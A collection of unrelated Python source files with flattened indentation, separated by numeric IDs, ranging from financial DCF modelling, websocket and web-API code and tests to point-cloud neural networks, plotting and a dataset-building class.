self._forecast['EBIT'] = self._forecast['EBITDA'] - self._forecast['D&A'] # noqa:E501
self._forecast['Interest'] = self._multiply_by_sales_percent(self.interest_to_sales)
self._forecast['EBT'] = self._forecast['EBIT'] - self._forecast['Interest']
self._forecast['Taxes'] = self._forecast['EBT'] * self.tax_rate
self._forecast.loc[-1, 'Taxes'] = self.company.income_statement.tax
self._forecast['Net Income'] = self._forecast['EBT'] - self._forecast['Taxes']
self._forecast['Capex'] = self._multiply_by_sales_percent(self.capex_to_sales)
# ΔSales * ΔNWC/ΔSales = ΔNWC
change_in_sales = np.diff(self._forecast['Sales'])
future_changes_nwc = change_in_sales * self.change_in_nwc_to_change_in_sales
self._forecast['Change in NWC'] = np.concatenate(([0.0], future_changes_nwc))
self._forecast['FCF'] = self._calculate_free_cash_flow()
self._forecast['Discounted FCF'] = self._discount_cash_flows()
return self._forecast
@property
def enterprise_value(self):
"""Enterprise value given by discounted cash flow analysis."""
return self.discounted_window_cash_flow + self.discounted_terminal_cash_flow
@property
def equity_value(self):
"""Returns total equity value of firm."""
return self.enterprise_value - self.company.balance_sheet.net_debt
@property
def equity_value_per_share(self):
"""Equity value divided by total number of shares outstanding."""
return self.equity_value / self.company.fully_diluted_shares
@property
def discounted_terminal_cash_flow(self):
"""Sum of discounted cash flows after window."""
f = self.forecast()
last_fcf = f.loc[self.window, 'Discounted FCF']
terminal_discount_minus_growth = (self.terminal_discount_rate - self.terminal_growth_rate)
tv_discounted_to_window = last_fcf * (1 + self.terminal_growth_rate) / terminal_discount_minus_growth
return tv_discounted_to_window / (1 + self.discount_rate) ** self.window
@property
def discounted_window_cash_flow(self):
"""Add up discounted cash flows from window."""
f = self.forecast()
return f.loc[0:, 'Discounted FCF'].sum()
@property
def absolute_upside_per_share(self):
return self.equity_value_per_share - self.company.price_per_share
@property
def percent_upside_per_share(self):
return self.absolute_upside_per_share / self.company.price_per_share
|
56968
|
import asyncio
import json
import logging
from typing import List, Set
import websockets
class BrowserWebsocketServer:
"""
The BrowserWebsocketServer manages our connection to our browser extension,
brokering messages between Google Meet and our plugin's EventHandler.
We expect browser tabs (and our websockets) to come and go, and our plugin is
long-lived, so we have a lot of exception handling to do here to keep the
plugin running. Most actions are "best effort".
We also have to handle the possibility of multiple browser websockets at the
same time, e.g. in case the user refreshes their Meet window and we have stale
websockets hanging around, or if we have multiple Meet tabs.
"""
def __init__(self):
"""
Remember to call start() before attempting to use your new instance!
"""
self._logger = logging.getLogger(__name__)
"""
Store all of the connected sockets we have open to the browser extension,
so we can use them to send outbound messages from this plugin to the
extension.
"""
self._ws_clients: Set[websockets.WebSocketServerProtocol] = set()
"""
Any EventHandlers registered to receive inbound events from the browser extension.
"""
self._handlers: List["EventHandler"] = []
def start(self, hostname: str, port: int) -> None:
return websockets.serve(self._message_receive_loop, hostname, port)
async def send_to_clients(self, message: str) -> None:
"""
Send a message from our plugin to the Chrome extension. We broadcast to
any connections we have, in case the user has multiple Meet windows/tabs
open.
"""
if self._ws_clients:
self._logger.info(
f"Broadcasting message to connected browser clients: {message}")
await asyncio.wait([client.send(message) for client in self._ws_clients])
else:
self._logger.warn(
("There were no active browser extension clients to send our"
f" message to! Message: {message}"))
def register_event_handler(self, handler: "EventHandler") -> None:
"""
Register your EventHandler to have it receive callbacks whenever we
get an event over the wire from the browser extension.
"""
self._handlers.append(handler)
def num_connected_clients(self) -> int:
return len(self._ws_clients)
def _register_client(self, ws: websockets.WebSocketServerProtocol) -> None:
self._ws_clients.add(ws)
self._logger.info(
(f"{ws.remote_address} has connected to our browser websocket."
f" We now have {len(self._ws_clients)} active connection(s)."))
async def _unregister_client(self, ws: websockets.WebSocketServerProtocol) -> None:
try:
await ws.close()
except:
self._logger.exception(
"Exception while closing browser webocket connection.")
if ws in self._ws_clients:
self._ws_clients.remove(ws)
self._logger.info(
(f"{ws.remote_address} has disconnected from our browser websocket."
f" We now have {len(self._ws_clients)} active connection(s) remaining."))
async def _message_receive_loop(self, ws: websockets.WebSocketServerProtocol, uri: str) -> None:
"""
Loop of waiting for and processing inbound websocket messages, until the
connection dies. Each connection will create one of these coroutines.
"""
self._register_client(ws)
try:
async for message in ws:
self._logger.info(
f"Received inbound message from browser extension. Message: {message}")
await self._process_inbound_message(message)
except:
self._logger.exception(
"BrowserWebsocketServer encountered an exception while waiting for inbound messages.")
finally:
await self._unregister_client(ws)
if not self._ws_clients:
for handler in self._handlers:
try:
await handler.on_all_browsers_disconnected()
except:
self._logger.exception(
"Connection mananger received an exception from EventHandler!")
async def _process_inbound_message(self, message: str) -> None:
"""
Process one individual inbound websocket message.
"""
try:
parsed_event = json.loads(message)
except:
self._logger.exception(
f"Failed to parse browser websocket message as JSON. Message: {message}")
return
for handler in self._handlers:
try:
await handler.on_browser_event(parsed_event)
except:
self._logger.exception(
"Connection mananger received an exception from EventHandler!")
|
56973
|
from tool.runners.python import SubmissionPy
class JonSubmission(SubmissionPy):
def run(self, s):
claimed = dict()
for l in s.splitlines():
a = l.split('@')[1].strip().split(':')
b = a[0].split(',')
c = a[1].split('x')
x = int(b[0])
y = int(b[1])
w = int(c[0])
h = int(c[1])
for i in range(w):
for j in range(h):
pt = (x+i, y+j)
claimed[pt] = claimed.get(pt, 0) + 1
# copy-pasta ftw
for l in s.splitlines():
a = l.split('@')[1].strip().split(':')
b = a[0].split(',')
c = a[1].split('x')
x = int(b[0])
y = int(b[1])
w = int(c[0])
h = int(c[1])
overlap = False
for i in range(w):
for j in range(h):
pt = (x+i, y+j)
if claimed[pt] > 1:
overlap = True
if not overlap:
return l.split('@')[0].strip()[1:]
return 'nope'
|
56987
|
import pandas as pd
from pandas.testing import assert_frame_equal
import pytest
def assert_dataframes_equals(expected, actual):
assert expected.shape==actual.shape
assert set(expected.columns) == set(actual.columns)
columns_order = list(expected.columns)
a = actual[columns_order].sort_values(by=list(actual.columns)).reset_index(drop=True)
e = expected[columns_order].sort_values(by=list(actual.columns)).reset_index(drop=True)
assert_frame_equal(e, a, check_dtype=False)
def get_expected_and_actual(df):
actual_query_string = df.df_sql_convert_table.get_sql_string()
actual_columns = df.df_sql_convert_table.columns
datetime_columns = [c for c in actual_columns.keys() if actual_columns[c].dtype == 'DATETIME']
df_actual = pd.read_sql_query(actual_query_string, pytest.sql_connection, parse_dates=datetime_columns)
df_expected = df.df_pandas
return df_expected, df_actual
def assert_(df):
df_expected, df_actual = get_expected_and_actual(df)
# i = df_expected.new_value != df_actual.new_value
# a=df_expected[i][:3]
# b=df_expected[i][:3]
assert_dataframes_equals(df_expected, df_actual)
|
57038
|
import click
from gradient.cli import common
from gradient.cli.clusters import clusters
from gradient.cli.common import api_key_option
from gradient.commands.machine_types import ListMachineTypesCommand
@clusters.group("machineTypes", help="Manage machine types")
def machine_types_group():
pass
@machine_types_group.command("list", help="List available machine types")
@click.option(
"--clusterId",
"cluster_id",
help="Filter machine types by cluster ID",
cls=common.GradientOption,
)
@api_key_option
@common.options_file
def list_machine_types(cluster_id=None, options_file=None, api_key=None):
command = ListMachineTypesCommand(api_key=api_key)
command.execute(cluster_id=cluster_id)
|
57100
|
expected_output = {
"interfaces": {
"Port-channel1": {
"name": "Port-channel1",
"protocol": "lacp",
"members": {
"GigabitEthernet0/0/1": {
"activity": "Active",
"age": 18,
"aggregatable": True,
"collecting": True,
"defaulted": False,
"distributing": True,
"expired": False,
"flags": "FA",
"interface": "GigabitEthernet0/0/1",
"lacp_port_priority": 100,
"oper_key": 1,
"port_num": 2,
"port_state": 63,
"synchronization": True,
"system_id": "00127,6487.88ff.68ef",
"timeout": "Short",
},
"GigabitEthernet0/0/7": {
"activity": "Active",
"age": 0,
"aggregatable": True,
"collecting": False,
"defaulted": False,
"distributing": False,
"expired": False,
"flags": "FA",
"interface": "GigabitEthernet0/0/7",
"lacp_port_priority": 200,
"oper_key": 1,
"port_num": 1,
"port_state": 15,
"synchronization": True,
"system_id": "00127,6487.88ff.68ef",
"timeout": "Short",
},
},
}
}
}
|
57133
|
from django.urls import path
from . import views
app_name = 'core'
urlpatterns = [
path('', views.blog, name='blog'),
path('<int:pk>/', views.post_detail, name='post_detail'),
path('<int:pk>/share/', views.post_share, name='post_share'),
path('manage/', views.ManagePostListView.as_view(), name='manage'),
path('create/', views.PostCreateView.as_view(), name='create'),
path('<pk>/edit/', views.PostUpdateView.as_view(), name='post_edit'),
path('<pk>/delete/', views.PostDeleteView.as_view(), name='post_delete'),
]
|
57181
|
from ..model_tests_utils import (
status_codes,
DELETE,
PUT,
POST,
GET,
ERROR,
random_model_dict,
check_status_code,
compare_data
)
from core.models import (
ActionSequenceType,
ExperimentTemplate,
ActionSequence
)
actionsequence_test_data = {}
actionsequence_tests = [
##----TEST 0----##
#creates an experiment
#creates a actionsequencetype
#creates a actionsequence
#creates an actionsequence with the previous three entries as foreign keys/manytomanyfields
#gets the actionsequence
#puts the actionsequence adding the other parameterdef to the manytomany field
#gets the updated actionsequence
#deletes the updated actionsequence
#gets the actionsequence (should return error)
[
*[{
'name': name,
'method': POST,
'endpoint': 'actionsequence-list',
'body': random_model_dict(ActionSequence),
'args': [],
'query_params': [],
'is_valid_response': {
'function': check_status_code,
'args': [],
'kwargs': {
'status_code': POST
}
}
} for name in ['actionsequence0', 'actionsequence1']],
*[{
'name': name,
'method': POST,
'endpoint': 'actionsequencetype-list',
'body': random_model_dict(ActionSequenceType),
'args': [],
'query_params': [],
'is_valid_response': {
'function': check_status_code,
'args': [],
'kwargs': {
'status_code': POST
}
}
} for name in ['actionsequencetype0', 'actionsequencetype1']],
{
'name': 'actionsequence0',
'method': POST,
'endpoint': 'actionsequence-list',
'body': (request_body := random_model_dict(ActionSequence, parent='actionsequence0__url', action_sequence_type='actionsequencetype0__url')),
'args': [],
'query_params': [],
'is_valid_response': {
'function': compare_data,
'args': [],
'kwargs': {
'status_code': POST,
'request_body': request_body
}
}
},
{
'name': 'actionsequence0_get_0',
'method': GET,
'endpoint': 'actionsequence-detail',
'body': {},
'args': [
'actionsequence0__uuid'
],
'query_params': [],
'is_valid_response': {
'function': check_status_code,
'args': [],
'kwargs': {
'status_code': GET
}
}
},
{
'name': 'actionsequence0_update_0',
'method': PUT,
'endpoint': 'actionsequence-detail',
'body': (request_body := random_model_dict(ActionSequence, parent='actionsequence1__url', action_sequence_type='actionsequencetype1__url')),
'args': [
'actionsequence0__uuid'
],
'query_params': [],
'is_valid_response': {
'function': compare_data,
'args': [],
'kwargs': {
'status_code': PUT,
'request_body': request_body
}
}
},
{
'name': 'actionsequence0_get_1',
'method': GET,
'endpoint': 'actionsequence-detail',
'body': {},
'args': [
'actionsequence0__uuid'
],
'query_params': [],
'is_valid_response': {
'function': check_status_code,
'args': [],
'kwargs': {
'status_code': GET
}
}
},
{
'name': 'actionsequence0_delete_0',
'method': DELETE,
'endpoint': 'actionsequence-detail',
'body': {},
'args': [
'actionsequence0__uuid'
],
'query_params': [],
'is_valid_response': {
'function': check_status_code,
'args': [],
'kwargs': {
'status_code': DELETE
}
}
},
{
'name': 'actionsequence0_get_2',
'method': GET,
'endpoint': 'actionsequence-detail',
'body': {},
'args': [
'actionsequence0__uuid'
],
'query_params': [],
'is_valid_response': {
'function': check_status_code,
'args': [],
'kwargs': {
'status_code': ERROR
}
}
},
],
]
|
57270
|
import torch
import torch.nn as nn
from lightconvpoint.nn.deprecated.module import Module as LCPModule
from lightconvpoint.nn.deprecated.convolutions import FKAConv
from lightconvpoint.nn.deprecated.pooling import max_pool
from lightconvpoint.spatial.deprecated import sampling_quantized, knn, upsample_nearest
from lightconvpoint.utils.functional import batch_gather
class ResidualBlock(LCPModule):
def __init__(self, in_channels, out_channels, kernel_size, conv_layer, sampling, spatial_search, ratio, neighborhood_size):
super().__init__()
self.cv0 = nn.Conv1d(in_channels, in_channels//2, 1)
self.bn0 = nn.BatchNorm1d(in_channels//2)
self.cv1 = conv_layer(in_channels//2, in_channels//2, kernel_size, bias=False, sampling=sampling,
spatial_search=spatial_search, ratio=ratio, neighborhood_size=neighborhood_size)
self.bn1 = nn.BatchNorm1d(in_channels//2)
self.cv2 = nn.Conv1d(in_channels//2, out_channels, 1)
self.bn2 = nn.BatchNorm1d(out_channels)
self.activation = nn.ReLU()
self.shortcut = nn.Conv1d(in_channels, out_channels, 1) if in_channels != out_channels else nn.Identity()
self.ratio = ratio
def forward_without_features(self, pos, support_points=None, indices=None):
return self.cv1(None, pos)
def forward_with_features(self, x, pos, support_points, indices):
x_short = x
x = self.activation(self.bn0(self.cv0(x)))
x = self.activation(self.bn1(self.cv1(x, pos, support_points, indices)))
x = self.bn2(self.cv2(x))
if x_short.shape[2] != x.shape[2]:
x_short = max_pool(x_short, indices)
x_short = self.shortcut(x_short)
return self.activation(x + x_short)
class FKAConvNetwork(LCPModule):
def __init__(self, in_channels, out_channels, segmentation=False, hidden=64, conv_layer=FKAConv ,sampling=sampling_quantized, neighborhood_search=knn):
super().__init__()
self.lcp_preprocess = True
self.segmentation = segmentation
self.cv0 = conv_layer(in_channels, hidden, 16, sampling=sampling,
neighborhood_search=neighborhood_search, ratio=1, neighborhood_size=16)
self.bn0 = nn.BatchNorm1d(hidden)
self.resnetb01 = ResidualBlock(hidden, hidden, 16, conv_layer, sampling, neighborhood_search, 1, 16)
self.resnetb10 = ResidualBlock(hidden, 2*hidden, 16, conv_layer, sampling, neighborhood_search, 0.25, 16)
self.resnetb11 = ResidualBlock(2*hidden, 2*hidden, 16, conv_layer, sampling, neighborhood_search, 1, 16)
self.resnetb20 = ResidualBlock(2*hidden, 4*hidden, 16, conv_layer, sampling, neighborhood_search, 0.25, 16)
self.resnetb21 = ResidualBlock(4*hidden, 4*hidden, 16, conv_layer, sampling, neighborhood_search, 1, 16)
self.resnetb30 = ResidualBlock(4*hidden, 8*hidden, 16, conv_layer, sampling, neighborhood_search, 0.25, 16)
self.resnetb31 = ResidualBlock(8*hidden, 8*hidden, 16, conv_layer, sampling, neighborhood_search, 1, 16)
self.resnetb40 = ResidualBlock(8*hidden, 16*hidden, 16, conv_layer, sampling, neighborhood_search, 0.25, 16)
self.resnetb41 = ResidualBlock(16*hidden, 16*hidden, 16, conv_layer, sampling, neighborhood_search, 1, 16)
if self.segmentation:
self.cv5 = nn.Conv1d(32*hidden, 16 * hidden, 1)
self.bn5 = nn.BatchNorm1d(16*hidden)
self.cv3d = nn.Conv1d(24*hidden, 8 * hidden, 1)
self.bn3d = nn.BatchNorm1d(8 * hidden)
self.cv2d = nn.Conv1d(12 * hidden, 4 * hidden, 1)
self.bn2d = nn.BatchNorm1d(4 * hidden)
self.cv1d = nn.Conv1d(6 * hidden, 2 * hidden, 1)
self.bn1d = nn.BatchNorm1d(2 * hidden)
self.cv0d = nn.Conv1d(3 * hidden, hidden, 1)
self.bn0d = nn.BatchNorm1d(hidden)
self.fcout = nn.Conv1d(hidden, out_channels, 1)
else:
self.fcout = nn.Linear(1024, out_channels)
self.dropout = nn.Dropout(0.5)
self.activation = nn.ReLU()
def forward_without_features(self, pos, support_points=None, indices=None):
_, _, ids_conv0 = self.cv0(None, pos)
_, support1, ids10 = self.resnetb10(None, pos)
_, _, ids11 = self.resnetb11(None, support1[0])
_, support2, ids20 = self.resnetb20(None, support1[0])
_, _, ids21 = self.resnetb21(None, support2[0])
_, support3, ids30 = self.resnetb30(None, support2[0])
_, _, ids31 = self.resnetb31(None, support3[0])
_, support4, ids40 = self.resnetb40(None, support3[0])
_, _, ids41 = self.resnetb41(None, support4[0])
support_points = support1 + support2 + support3 + support4
indices = ids_conv0 + ids10 + ids11 + ids20 + ids21 + ids30 + ids31 + ids40 + ids41
if self.segmentation:
ids3u = upsample_nearest(support4[0], support3[0])
ids2u = upsample_nearest(support3[0], support2[0])
ids1u = upsample_nearest(support2[0], support1[0])
ids0u = upsample_nearest(support1[0], pos)
indices += [ids3u, ids2u, ids1u, ids0u]
return None, support_points, indices
def forward_with_features(self, x, pos, support_points=None, indices=None):
if (support_points is None) or (indices is None):
_, indices, support_points = self.compute_indices(pos)
if self.segmentation:
ids0, ids10, ids11, ids20, ids21, ids30, ids31, ids40, ids41, ids3u, ids2u, ids1u, ids0u = indices
else:
ids0, ids10, ids11, ids20, ids21, ids30, ids31, ids40, ids41 = indices
support1, support2, support3, support4 = support_points
x0 = self.activation(self.bn0(self.cv0(x, pos, pos, ids0)))
x0 = self.resnetb01(x0, pos, pos, ids0)
x1 = self.resnetb10(x0, pos, support1, ids10)
x1 = self.resnetb11(x1, support1, support1, ids11)
x2 = self.resnetb20(x1, support1, support2, ids20)
x2 = self.resnetb21(x2, support2, support2, ids21)
x3 = self.resnetb30(x2, support2, support3, ids30)
x3 = self.resnetb31(x3, support3, support3, ids31)
x4 = self.resnetb40(x3, support3, support4, ids40)
x4 = self.resnetb41(x4, support4, support4, ids41)
if self.segmentation:
x5 = x4.max(dim=2, keepdim=True)[0].expand_as(x4)
x4 = self.activation(self.bn5(self.cv5(torch.cat([x4, x5], dim=1))))
xout = batch_gather(x4, 2, ids3u)
xout = self.activation(self.bn3d(self.cv3d(torch.cat([xout, x3], dim=1))))
xout = batch_gather(xout, 2, ids2u)
xout = self.activation(self.bn2d(self.cv2d(torch.cat([xout, x2], dim=1))))
xout = batch_gather(xout, 2, ids1u)
xout = self.activation(self.bn1d(self.cv1d(torch.cat([xout, x1], dim=1))))
xout = batch_gather(xout, 2, ids0u)
xout = self.activation(self.bn0d(self.cv0d(torch.cat([xout, x0], dim=1))))
xout = self.dropout(xout)
xout = self.fcout(xout)
else:
xout = x4.mean(dim=2)
xout = self.dropout(xout)
xout = self.fcout(xout)
return xout
|
57272
|
import requests
import os
url_image = 'https://www.python.org/static/community_logos/python-logo.png'
r_image = requests.get(url_image)
print(r_image.headers['Content-Type'])
# image/png
filename_image = os.path.basename(url_image)
print(filename_image)
# python-logo.png
with open('data/temp/' + filename_image, 'wb') as f:
f.write(r_image.content)
url_zip = 'http://www.post.japanpost.jp/zipcode/dl/oogaki/zip/13tokyo.zip'
r_zip = requests.get(url_zip)
print(r_zip.headers['Content-Type'])
# application/zip
filename_zip = os.path.basename(url_zip)
print(filename_zip)
# 13tokyo.zip
with open('data/temp/' + filename_zip, 'wb') as f:
f.write(r_zip.content)
|
57297
|
import falcon
import six
from monitorrent.settings_manager import SettingsManager
# noinspection PyUnusedLocal
class SettingsNotifyOn(object):
def __init__(self, settings_manager):
"""
:type settings_manager: SettingsManager
"""
self.settings_manager = settings_manager
def on_get(self, req, resp):
resp.json = self.settings_manager.get_external_notifications_levels()
def on_put(self, req, resp):
if req.json is None or len(req.json) == 0:
raise falcon.HTTPBadRequest('BodyRequired', 'Expecting not empty JSON body')
if not isinstance(req.json, list) or any([not isinstance(i, six.text_type) for i in req.json]):
raise falcon.HTTPBadRequest('ArrayOfStringExpected', 'Expecting list of string values')
existing_levels = self.settings_manager.get_existing_external_notifications_levels()
unknown_levels = [l for l in req.json if l not in existing_levels]
if len(unknown_levels) > 0:
raise falcon.HTTPBadRequest('UnknownLevels', '{0} are unknow levels'.format(unknown_levels))
self.settings_manager.set_external_notifications_levels(req.json)
resp.status = falcon.HTTP_NO_CONTENT
|
57322
|
import matplotlib.pyplot as plt
import numpy as np
import os
import pickle
def get_mean_stds(data):
return np.mean(data), np.std(data) / np.sqrt(len(data)) * 1.96
if __name__ == '__main__':
labels = ['OpenTAL', 'EDL', 'SoftMax']
result_folders = ['edl_oshead_iou', 'edl_15kc', 'default']
colors = ['k', 'g', 'm']
split = '0'
tiou_target = 0.3
tidx = 0 # 0-4 for [0,3...,0.7]
items = ['$TP_{u2u}$', '$TP_{k2k}$', '$FP_{u2k}$', '$FP_{k2k}$', '$FP_{k2u}$', '$FP_{bg2u}$', '$FP_{bg2k}$']
fontsize = 18
width = 0.25
fig_path = 'experiments/figs'
os.makedirs(fig_path, exist_ok=True)
xrng = np.arange(len(items))
fig, ax = plt.subplots(1,1, figsize=(8,5))
plt.rcParams["font.family"] = "Arial"
for idx, (folder, label, color) in enumerate(zip(result_folders, labels, colors)):
# load result file
result_file = os.path.join('output', folder, f'split_{split}', 'open_stats.pkl')
with open(result_file, 'rb') as f:
stats = pickle.load(f)
print(label)
all_scores = 1 - np.array(stats['ood_scores'])
mean_scores = np.zeros((7))
std_scores = np.zeros((7))
mean_scores[0], std_scores[0] = get_mean_stds(all_scores[stats['tp_u2u'][tidx] > 0])
mean_scores[1], std_scores[1] = get_mean_stds(all_scores[stats['tp_k2k'][tidx].sum(axis=0) > 0])
mean_scores[2], std_scores[2] = get_mean_stds(all_scores[stats['fp_u2k'][tidx].sum(axis=0) > 0])
mean_scores[3], std_scores[3] = get_mean_stds(all_scores[stats['fp_k2k'][tidx].sum(axis=0) > 0])
mean_scores[4], std_scores[4] = get_mean_stds(all_scores[stats['fp_k2u'][tidx] > 0])
mean_scores[5], std_scores[5] = get_mean_stds(all_scores[stats['fp_bg2u'][tidx] > 0])
mean_scores[6], std_scores[6] = get_mean_stds(all_scores[stats['fp_bg2k'][tidx].sum(axis=0) > 0])
h = ax.bar(xrng + (idx-1) * width, mean_scores, yerr=std_scores, width=width, label=f'{label}', align='center', alpha=0.5, ecolor='black', color=color)
ax.set_ylim(0, 1.2)
ax.set_ylabel('OOD Scores', fontsize=fontsize)
ax.set_xticks(xrng)
ax.set_xticklabels(items, fontsize=fontsize-3)
ax.legend(fontsize=fontsize, loc='upper center', ncol=3)
plt.yticks(fontsize=fontsize)
plt.tight_layout()
plt.savefig(os.path.join(fig_path, 'OOD_Score_compare.png'))
|
57355
|
import random
import _jsonnet, json
import logging
import hashlib
import os
from copy import deepcopy
import pandas as pd
from tqdm import tqdm
import math
from LeapOfThought.resources.teachai_kb import TeachAIKB
from LeapOfThought.common.general import num2words1, bc
from LeapOfThought.common.data_utils import uniform_sample_by_column, pandas_multi_column_agg
# This is mainly for testing and debugging ...
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 2000)
pd.set_option('display.max_colwidth', 200)
pd.set_option("display.colheader_justify","left")
import numpy as np
from LeapOfThought.common.file_utils import upload_jsonl_to_s3, save_jsonl_to_local, is_path_creatable
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
level=logging.INFO)
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
class ArtiSet():
def __init__(self, args):
random.seed(17)
np.random.seed(1234)
self._np_seed = np.random.RandomState(17)
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), args.config_path) ,'r') as f:
self._config = json.load(f)[self.artiset_name]
if args.__contains__('variant') and len(args.variant) > 0:
self._output_file = args.output_file.replace('.jsonl','_' + args.variant + '.jsonl')
if len(args.experiment_version) > 0:
self._output_file = self._output_file.replace('.jsonl', '_' + args.experiment_version + '.jsonl')
else:
self._output_file = args.output_file
self._split = args.split_by_field
self._incorrect_beliefs = None
if "incorrect_beliefs_file" in args and args.incorrect_beliefs_file:
with open(args.incorrect_beliefs_file, 'r') as file:
self._incorrect_beliefs = [json.loads(line.strip()) for line in file]
self._save_sample = args.save_sample
self.artiset_data = []
def append_teachyourai_format_example(self, example, do_print=False, append_to_list=None):
"""append_teachyourai_format_example() is method implemented in ArtiSet class and takes an example dict
(that must contain a "phrase", "answer") and converts it to a BooleanQA format
Args:
example (dict): an example containing question,answer,dist1,dist2 fields
do_print (bool): just for debuging
num_choices (int): number of choices in question (between 2 and 5)
append_to_list (list): a
Returns:
"""
if 'context' not in example:
example['context'] = ''
if 'id' not in example:
example['id'] = self.create_qid(example)
if do_print:
print('a:%s d1:%s d2:%s || Q:%s' % (example['phrase'], example['answer']))
if append_to_list is not None:
append_to_list.append(example)
else:
self.artiset_data.append(example)
@staticmethod
def create_qid(example):
m = hashlib.md5()
m.update(example['phrase'].encode())
m.update(example['context'].encode())
# boolean examples have binary answer (int 0 or 1)
m.update(str(example['answer']).encode())
return m.hexdigest()
def split_by_columns(self):
split_columns = self._split.split(',')
examples = self.examples_meta
indexes = {}
# check the split columns are in the data
if len(set(split_columns) - set(examples.columns)) != 0:
raise (ValueError("split columns used to split dev/test and train set do not exist the examples_meta!"))
all_objs = []
for split_column in split_columns:
all_objs += list(examples[split_column])
#best_train_inds, best_dev_inds, best_test_inds = [], [], []
inds = [i for i in range(len(self.artiset_data))]
random.seed(17)
random.shuffle(inds)
if len(split_columns) > 1:
test_inds = random.sample(inds, self._config['test_dev_size'][0])
inds = list(set(inds) - set(test_inds))
dev_inds = random.sample(inds, self._config['test_dev_size'][1])
dev_test_examples = examples.iloc[test_inds + dev_inds]
dev_test_objs = []
for split_column in split_columns:
dev_test_objs += list(dev_test_examples[split_column])
dev_test_objs = pd.Series(list(set(dev_test_objs)))
else:
# We'll choice the test-dev examples from values of split that have the lowest number of examples.
# this will insure we are choosing to highest amount of training examples that are still disjoint on split_columns[0] from dev+test
split_columns_value_counts = examples[split_columns[0]].value_counts().sort_values().cumsum().reset_index()
start_ind = split_columns_value_counts[split_columns_value_counts[split_columns[0]] > \
sum(self._config['test_dev_size'])].index[0] + 1
dev_test_objs = list(split_columns_value_counts['index'][0:start_ind])
dev_test_examples = examples[examples[split_columns[0]].isin(dev_test_objs)]
inds = list(dev_test_examples.index)
test_inds = random.sample(inds, self._config['test_dev_size'][0])
inds = list(set(inds) - set(test_inds))
dev_inds = random.sample(inds, self._config['test_dev_size'][1])
for split_column in split_columns:
indexes[split_column] = examples.set_index(split_column)
dev_ids = set()
not_in_train_ids = set()
for split_column in split_columns:
dev_ids = dev_ids & set(indexes[split_column][indexes[split_column].index.isin(dev_test_objs)]['qid'])
not_in_train_ids = not_in_train_ids | set(indexes[split_column][indexes[split_column].index.isin(dev_test_objs)]['qid'])
train_examples = examples.loc[~examples['qid'].isin(not_in_train_ids), :]
train_inds = list(train_examples.index)
if len(train_inds) > self._config['max_number_of_examples']:
train_inds = train_inds[0:self._config['max_number_of_examples']]
random.shuffle(train_inds)
print("total dev-test examples available: %d" % (len(dev_test_examples)))
print("split produced %d training examples" % (len(train_inds)))
return train_inds, dev_inds, test_inds
def save_dataset(self):
"""save_dataset() automatically saves the artiset
if the config output_file contains the string _sample.jsonl it will be saved in a more readable format
otherwise it will split the examples in self.artiset_data into train, dev, test and save them in s3
if output_file startswith s3:// otherwise locally. (If output_file is empty, it will not save)
Args:
arg1 (int): Description of arg1
arg2 (str): Description of arg2
Returns:
bool: Description of return value
"""
# Move non-required columns to metadata:
artiset_data_with_metadata = []
for example in self.artiset_data:
if 'metadata' not in example:
new_example = {'metadata':{}}
else:
new_example = {'metadata': example['metadata']}
new_example.update({k:example[k] for k in ['id', 'phrase', 'context', 'answer']})
new_example['metadata'].update({k: example[k] for k in set(example.keys()) - {'id', 'phrase', 'context', 'answer','metadata'}})
artiset_data_with_metadata.append(new_example)
self.artiset_data = artiset_data_with_metadata
# splitting
if len(self._split) > 0:
train_inds, dev_inds, test_inds = self.split_by_columns()
elif 'split' in self.examples_meta:
test_inds = list(self.examples_meta[self.examples_meta['split'] == 'test'].index)
dev_inds = list(self.examples_meta[self.examples_meta['split'] == 'dev'].index)
train_inds = list(self.examples_meta[self.examples_meta['split'] == 'train'].index)
random.seed(17)
random.shuffle(train_inds)
#random.shuffle(test_inds)
#random.shuffle(dev_inds)
test_inds = test_inds[0: self._config['test_dev_size'][0]]
dev_inds = dev_inds[0:self._config['test_dev_size'][1]]
train_inds = train_inds[0:self._config['max_number_of_examples']]
else:
inds = [i for i in range(len(self.artiset_data))]
random.seed(17)
random.shuffle(inds)
test_inds = inds[0:self._config['test_dev_size'][0]]
dev_inds = inds[self._config['test_dev_size'][0]:sum(self._config['test_dev_size'])]
train_inds = inds[sum(self._config['test_dev_size']):]
if self._output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(self._output_file) and len(self._output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
if self._save_sample:
if 'split' in self.examples_meta.columns:
logger.info(f"size of each split:\n{self.examples_meta['split'].value_counts()}")
random.seed(17)
if len(self.artiset_data) > 100:
self.artiset_data = random.sample(self.artiset_data,100)
save_func(self._output_file, self.artiset_data, sample_indent=self._save_sample)
else:
logger.info('uploading %d,%d,%d test,dev,train examples' % (len(test_inds),len(dev_inds),len(train_inds)))
save_func(self._output_file.replace('.jsonl', '_test.jsonl'), [self.artiset_data[i] for i in test_inds])
save_func(self._output_file.replace('.jsonl', '_dev.jsonl'), [self.artiset_data[i] for i in dev_inds])
save_func(self._output_file.replace('.jsonl', '_train.jsonl'), [self.artiset_data[i] for i in train_inds])
if len(self.examples_meta) > 0:
save_func(self._output_file.replace('.jsonl', '_meta.jsonl'), self.examples_meta.to_dict(orient='rows'))
return train_inds, dev_inds, test_inds
def save_single_split(self, split_data, split):
inds = [i for i in range(len(split_data))]
random.seed(17)
random.shuffle(inds)
if self._output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(self._output_file) and len(self._output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
si = self._output_file.find('_sample') > -1
save_func(self._output_file.replace('.jsonl', '_' + split + '.jsonl'), [split_data[i] for i in inds], sample_indent=si)
def save_aux_data(self, output_file, data):
if output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(output_file) and len(output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
si = output_file.find('_sample') > -1
save_func(output_file, data, sample_indent=si)
def build_artificial_dataset(self,args):
pass
def resplit(self, args):
logger.error('Not implemented for this artiset')
def build_statement_rule_property_examples(self, examples, split, statement_tag='statement', ablate_same_distractor_fields = 1.0,\
rule_tags=['implicit_rule','property'], distractor_tags = ['distractors'], ablation_list=[], use_shorthand=False, \
nlg_sampling=False, reverse_validity_frac=0):
